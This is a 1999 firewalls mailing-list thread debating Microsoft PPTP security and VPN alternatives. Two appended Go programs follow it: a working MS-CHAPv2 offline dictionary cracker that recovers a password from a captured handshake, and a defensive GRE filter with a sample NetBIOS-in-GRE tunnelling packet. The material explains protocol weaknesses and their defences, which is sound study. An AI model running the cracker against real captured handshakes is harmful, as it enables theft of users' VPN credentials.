I wasn't being defensive.  I was simply pointing out that everybody says 'X
stinks', but never gives a suggestion for something better.  If you think
PPTP is so bad and the MS guys can't code, then code something yourself and
put it out for peer review.  Maybe an open source equivalent to PPTP (IPSec
based? PGP based?) is the answer and if people spent their time working on
that, instead of complaining about pptp, we'd have something usable.
 
I am also well aware of the 'every defense can be broken, given enough time
and money' and am also aware that every security solution is a balance of
cost of security versus cost of intrusion.  I'm serious about wanting to
know specific alternatives to PPTP, their pros, cons, and pricetags. 
 
People say IPSec, but until very recently (last 3-6 months), there was
almost no IPSec software available that was the equivalent in functionality
to PPTP.  I found a PGP VPN software at NAI.com today and am going to test
that and am trying to get a cisco vpn client for testing with their pix, and
maybe that's the solution.  We'll see. Anybody have any other specific
suggestions? 

-----Original Message-----
From: Bob Dolliver [mailto:[EMAIL PROTECTED]]
Sent: Monday, December 27, 1999 2:37 PM
To: '[EMAIL PROTECTED]'; [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: RE: MS PPTP (Safe?) - alternative?



Microsoft has improved the security of the PPTP protocol to correct some of
the major weaknesses in the previous MS-CHAP version 1, precisely because
other network professionals pointed out weaknesses in the protocol after a
professional peer review. However, the encryption strength of MS-PPTP
still wholly relies on the password chosen by the users. As we all know,
password-based encryption schemes are open to dictionary and distributed
resource attacks. The point is not to bitch about anything; it is simply
pointing out that anyone interested in designing a secure VPN may have much
better choices than the MS PPTP protocol: L2TP with IPSec in transport mode,
for example, if a VPN must support legacy networks; if the house is IP, then
IPSec is the most logical choice. Professionals need to have this distrust
of their own work as well as the work of others, to participate in an
objective peer review system; no need to get defensive. As others have
pointed out already, the details of the deficiencies of the MS-PPTP protocol
can be found at www.counterpane.com

Regards

Robert Dolliver
Educational Services
Nortel Networks
1 Federal St.
Billerica Ma

PGP users my key server is located at: pgpkeys.mit.edu
my key hash is: 71DD 037B AE30 C046 9D3B  795B D9CB 248D 44F0 1895

        -----Original Message----- 
From:   [EMAIL PROTECTED] [SMTP:[EMAIL PROTECTED]] 
Sent:   Monday, December 27, 1999 12:22 PM 
To:     [EMAIL PROTECTED]; [EMAIL PROTECTED] 
Subject:        RE: MS PPTP (Safe?) - alternative? 

This should instigate an interesting discussion.  As I too am in a Microsoft
shop, I would also be interested in some constructive answers to Paul's
questions.

        > ---------- 
> From:         Paul Gracy[SMTP:[EMAIL PROTECTED]] 
> Sent:         Monday, December 27, 1999 8:01 AM 
> To:   [EMAIL PROTECTED] 
> Subject:      RE: MS PPTP (Safe?) - alternative? 
> 
> Since I'm an engineer and just want to get some done from home... 
> 
> Ok.  So a bunch of people dislike PPTP (version 1 and 2).  But nobody has 
> offered a constructive comment.  So kindly do so, or quit your bitchin'. 
> 
> Constructive comments are defined in my world as 1 of these 3 things: 
> 1) Do this and pptp is as safe as it gets.  Your level of risk is X. 
> Knowing this, use or don't, as you choose. 
> 2) Use protocol / software XYZ as a replacement for PPTP; it only costs 
> x$. 
> 3) "I've written a replacement; source and binaries are available at 
> www.____.___/pptp_replacement.html.  Please perform peer review and let me
> know if you find any bugs."
> 
> I'm waiting....... 
> 
> -----Original Message----- 
> From: Brian Steele [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, December 14, 1999 11:34 AM 
> To: [EMAIL PROTECTED] 
> Subject: Re: MS PPTP (Safe?) 
> 
> 
> ...and you can do this without being first authenticated by the NT server 
> providing the VPN service? 
> 
> Brian Steele 
> 
> 
> ----- Original Message ----- 
> From: <[EMAIL PROTECTED]> 
> To: "Jimi Aleshin" <[EMAIL PROTECTED]> 
> Cc: "J. T. B." <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]> 
> Sent: Tuesday, December 14, 1999 9:44 AM 
> Subject: Re: MS PPTP (Safe?) 
> 
> 
> > 
> > One thing to remember, protocol 47 is GRE (Generic Route Encapsulation).
> > Remember the days of disabling 
> > Source Route Forwarding at the TCP Layer ???? 
> > GRE is in it's basic form, the very same thing at the IP layer. 
> > 
> > What does this mean ???? 
> > 
> > Well, I could send a GRE packet that contains another protocol in its 
> payload. 
> > This could be, for example, NETBIOS. 
> > I could then use a GRE stream to browse your Windows NT domain. 
> > 
> > Please review RFC 1702 paying strong attention to the section on IP Source Route
> > 
> > http://www.ietf.org/rfc/rfc1702.txt
> > 
> > After you read the RFC, you may want to consider the risks associated with it.
> > 
> > "Jimi Aleshin" <[EMAIL PROTECTED]> on 12/13/99 05:45:38 PM 
> > 
> > Please respond to "Jimi Aleshin" <[EMAIL PROTECTED]> 
> > 
> > To:   "J. T. B." <[EMAIL PROTECTED]>, [EMAIL PROTECTED] 
> > cc:    (bcc: Jerry Kendall/Inc/Celestica) 
> > 
> > Subject:  Re: MS PPTP (Safe?) 
> > 
> > It is an implementation of PPP over TCP. This means that a user must already
> > have an Internet connection. The technology creates a second virtual PPP
> > network adapter. By using the native PPP authentication and encryption
> > services, the technology is easily implemented using existing technology.
> > Originally developed by Microsoft, U.S. Robotics (now 3Com), Ascend, and
> > other remote access companies.
> > In 1998, a severe flaw was found in PPTP's authentication scheme. This was
> > fixed in MS-CHAP V2 of Microsoft's implementation.
> > When setting up a PPTP server, you must enable port 1723 and protocol 47
> > through the firewall.
> > So try it out. 
> > 
> >  /Jimi Aleshin 
> >  Mail: [EMAIL PROTECTED] 
> >  ICQ: 26180172 
> > 
> > ----- Original Message ----- 
> > From: J. T. B. 
> > To: [EMAIL PROTECTED] 
> > Sent: Monday, December 13, 1999 01:09 PM 
> > Subject: MS PPTP (Safe?) 
> > 
> > I'm looking at building a secure VPN and was wondering if Microsoft's PPTP
> > was any good?  I had heard some very bad things about it.  Have they cleaned
> > it up, or should I look elsewhere?
> > 
> > Thanks! 
> > 
> > - 
> > [To unsubscribe, send mail to [EMAIL PROTECTED] with 
> > "unsubscribe firewalls" in the body of the message.] 
> > 
> > 
> 
> 

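Bob Dolliver's point above, that the strength of MS-PPTP rests entirely on the password the user chose, is exactly what an offline dictionary attack on a captured MS-CHAPv2 exchange exploits. The Go program below is an added example written for this page; it is not code from the thread, from Microsoft or from any product. It implements the RFC 2759 response computation (MD4 is written out because Go's standard library does not ship it), then replays that computation over a wordlist against a handshake whose user name, challenges and password are all constructed here for the demonstration.

```go
package main

import (
	"bytes"
	"crypto/des"
	"crypto/sha1"
	"encoding/binary"
	"encoding/hex"
	"fmt"
	"unicode/utf16"
)

// md4 is RFC 1320 MD4, written out because Go's standard library does not ship it.
func md4(data []byte) [16]byte {
	msg := append(append([]byte{}, data...), 0x80)
	for len(msg)%64 != 56 {
		msg = append(msg, 0)
	}
	msg = binary.LittleEndian.AppendUint64(msg, uint64(len(data))*8)
	h := [4]uint32{0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476}
	shifts := [3][4]uint{{3, 7, 11, 19}, {3, 5, 9, 13}, {3, 9, 11, 15}}
	for off := 0; off < len(msg); off += 64 {
		a, b, c, d := h[0], h[1], h[2], h[3]
		for i := 0; i < 48; i++ {
			r, j := i/16, i%16
			f, k := b&c|^b&d, j // round 1: F, message words in order
			if r == 1 { // round 2: G, words 0,4,8,12,1,5,...
				f, k = (b&c|b&d|c&d)+0x5a827999, 4*(j%4)+j/4
			} else if r == 2 { // round 3: H, words in bit-reversed order 0,8,4,12,...
				f, k = (b^c^d)+0x6ed9eba1, 8*(j&1)+4*(j>>1&1)+2*(j>>2&1)+j>>3
			}
			t, s := a+f+binary.LittleEndian.Uint32(msg[off+4*k:]), shifts[r][i%4]
			a, b, c, d = d, t<<s|t>>(32-s), b, c
		}
		h[0], h[1], h[2], h[3] = h[0]+a, h[1]+b, h[2]+c, h[3]+d
	}
	var out [16]byte
	for i, v := range h {
		binary.LittleEndian.PutUint32(out[4*i:], v)
	}
	return out
}

// ntHash is RFC 2759 NtPasswordHash: MD4 over the UTF-16LE encoded password.
func ntHash(password string) [16]byte {
	var buf []byte
	for _, c := range utf16.Encode([]rune(password)) {
		buf = append(buf, byte(c), byte(c>>8))
	}
	return md4(buf)
}

// challengeHash is RFC 2759 ChallengeHash, the 8-byte DES plaintext both sides derive.
func challengeHash(peerChallenge, authChallenge []byte, username string) []byte {
	sum := sha1.Sum(append(append(append([]byte{}, peerChallenge...), authChallenge...), username...))
	return sum[:8]
}

// ntResponse is RFC 2759 ChallengeResponse: hash zero-padded to 21 bytes, cut into three DES keys (the third has only 16 secret bits).
func ntResponse(challenge []byte, hash [16]byte) []byte {
	var padded [21]byte
	copy(padded[:], hash[:])
	out := make([]byte, 24)
	for i := 0; i < 3; i++ {
		var acc uint64 // spread the 56 key bits over 8 bytes, 7 per byte, parity bit low
		for _, b := range padded[7*i : 7*i+7] {
			acc = acc<<8 | uint64(b)
		}
		var k8 [8]byte
		for j := 7; j >= 0; j-- {
			k8[j], acc = byte(acc&0x7f)<<1, acc>>7
		}
		block, _ := des.NewCipher(k8[:]) // key length is always 8, so err is always nil
		block.Encrypt(out[8*i:], challenge)
	}
	return out
}

// crack replays the client's computation per candidate: user name, challenges and response are all on the wire.
func crack(username string, authChallenge, peerChallenge, response []byte, wordlist []string) (string, bool) {
	ch := challengeHash(peerChallenge, authChallenge, username)
	for _, w := range wordlist {
		if bytes.Equal(ntResponse(ch, ntHash(w)), response) {
			return w, true
		}
	}
	return "", false
}

func main() {
	// Constructed handshake, not a real capture: the user chose "Winter99".
	user := "pgracy"
	authChallenge, _ := hex.DecodeString("0f1e2d3c4b5a69788796a5b4c3d2e1f0")
	peerChallenge, _ := hex.DecodeString("a1b2c3d4e5f60718293a4b5c6d7e8f90")
	response := ntResponse(challengeHash(peerChallenge, authChallenge, user), ntHash("Winter99"))
	pw, ok := crack(user, authChallenge, peerChallenge, response, []string{"password", "Summer99", "Winter99"})
	fmt.Printf("NT-Response %s -> password %q (found=%v)\n", hex.EncodeToString(response), pw, ok)
}
```

Nothing in the loop touches the server: a passive capture of one handshake is enough, so account lockout does not slow the attacker down, and the rate is bounded only by how fast MD4 and three DES blocks run. The zero padding also means the third DES block depends on only two bytes of the NT hash, which is why the password, not the 128-bit hash, sets the real work factor.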
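Jimi Aleshin's note that the firewall must pass TCP port 1723 and IP protocol 47, together with Jerry Kendall's warning that a GRE packet can carry any protocol in its payload, points at one concrete check: of all protocol-47 traffic, only PPTP-style GRE belongs on that rule. The Go program below is an added example written for this page, not code from the thread or from any firewall vendor. It parses the IPv4 and GRE headers (RFC 1701 layout, RFC 2637 enhanced GRE), refuses packets that carry the GRE routing field, and accepts only version-1 GRE with a key (call ID) whose protocol type is PPP (0x880B). The packet builder and both sample packets are constructed for the demonstration; the IP checksum is left zero and not validated.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
)

// GRE header bits (RFC 1701) plus the A bit and version 1 of PPTP's enhanced GRE (RFC 2637).
const (
	greC, greR, greK, greS, greA = 0x8000, 0x4000, 0x2000, 0x1000, 0x0080
	greVersion                   = 0x0007
	ipProtoGRE                   = 47
	protoTypePPP                 = 0x880B // the only protocol type a PPTP data channel carries
)

type GREInfo struct {
	Version   int
	ProtoType uint16 // Ethertype of the payload: 0x880B PPP, 0x0800 IPv4, ...
	HasKey    bool
	CallID    uint16 // low 16 bits of the key field (PPTP)
	Payload   []byte
}

// parseIPv4GRE walks the IPv4 header and the GRE header that follows it.
func parseIPv4GRE(pkt []byte) (*GREInfo, error) {
	if len(pkt) < 20 || pkt[0]>>4 != 4 {
		return nil, errors.New("not an IPv4 packet")
	}
	ihl := int(pkt[0]&0x0f) * 4
	if ihl < 20 || len(pkt) < ihl+4 {
		return nil, errors.New("truncated IPv4 or GRE header")
	}
	if pkt[9] != ipProtoGRE {
		return nil, fmt.Errorf("IP protocol %d is not GRE", pkt[9])
	}
	gre := pkt[ihl:]
	flags := binary.BigEndian.Uint16(gre)
	if flags&greR != 0 { // RFC 1701 routing field carries GRE-level source routes; refuse rather than misparse
		return nil, errors.New("GRE source routing present")
	}
	info := &GREInfo{Version: int(flags & greVersion), ProtoType: binary.BigEndian.Uint16(gre[2:])}
	// each flag is a power of two, so flags&bit/bit is 0 or 1
	c, k, s, a := int(flags&greC)/greC, int(flags&greK)/greK, int(flags&greS)/greS, int(flags&greA)/greA
	if info.Version != 1 {
		a = 0 // the acknowledgement field exists only in enhanced GRE
	}
	off := 4 + 4*(c+k+s+a) // optional fields in header order: checksum, key, sequence, ack
	if len(gre) < off {
		return nil, errors.New("truncated GRE options")
	}
	if k == 1 {
		info.HasKey, info.CallID = true, binary.BigEndian.Uint16(gre[4+4*c+2:])
	}
	info.Payload = gre[off:]
	return info, nil
}

// filterGRE is the policy for protocol 47 in front of a PPTP server: only enhanced GRE carrying
// PPP is PPTP; any other GRE packet is a tunnel delivering whatever sits inside it, NetBIOS included.
func filterGRE(pkt []byte) (string, error) {
	info, err := parseIPv4GRE(pkt)
	if err != nil {
		return "drop", err
	}
	if info.Version == 1 && info.HasKey && info.ProtoType == protoTypePPP {
		return "accept", nil
	}
	return "drop", fmt.Errorf("GRE version %d, protocol type 0x%04x is not PPTP", info.Version, info.ProtoType)
}

// buildIPv4GRE assembles a minimal sample packet; opts holds the optional GRE fields (key, sequence, ack) in header order.
func buildIPv4GRE(flags, protoType uint16, opts, payload []byte) []byte {
	ip := []byte{0x45, 0, 0, 0, 0, 0, 0, 0, 64, ipProtoGRE, 0, 0, 10, 0, 0, 5, 192, 0, 2, 10}
	pkt := binary.BigEndian.AppendUint16(ip, flags)
	pkt = binary.BigEndian.AppendUint16(pkt, protoType)
	pkt = append(append(pkt, opts...), payload...)
	binary.BigEndian.PutUint16(pkt[2:], uint16(len(pkt)))
	return pkt
}

// Constructed samples, not captures: a PPTP data packet, and plain GRE version 0 wrapping an
// IPv4/TCP segment to port 139 (NetBIOS session), the case the thread warns about.
func samplePPTP() []byte {
	ppp := []byte{0xff, 0x03, 0x00, 0x21, 0x45, 0x00} // start of a PPP frame, protocol 0x0021 (IP)
	return buildIPv4GRE(greK|1, protoTypePPP, []byte{0, 6, 0x12, 0x34}, ppp) // key: length 6, call ID 0x1234
}

func sampleNetBIOSinGRE() []byte {
	tcp := []byte{0x45, 0, 0, 40, 0, 0, 0, 0, 64, 6, 0, 0, 10, 9, 9, 9, 192, 0, 2, 10, 0x04, 0xd2, 0x00, 0x8b}
	return buildIPv4GRE(0, 0x0800, nil, tcp) // inner TCP: src 1234, dst 139
}

func main() {
	for _, pkt := range [][]byte{samplePPTP(), sampleNetBIOSinGRE(), buildIPv4GRE(greR, 0x0800, nil, nil)} {
		fmt.Println(filterGRE(pkt))
	}
}
```

The parser is the point, not the verdict strings: a packet filter that matches only on "protocol 47" lets the second sample through, and what arrives behind the firewall is then an ordinary TCP segment to port 139. Whether a given firewall product can express the version, key and protocol-type conditions on protocol 47 is worth checking before relying on it; if it cannot, the GRE side of a PPTP rule is wider than the PPTP server needs.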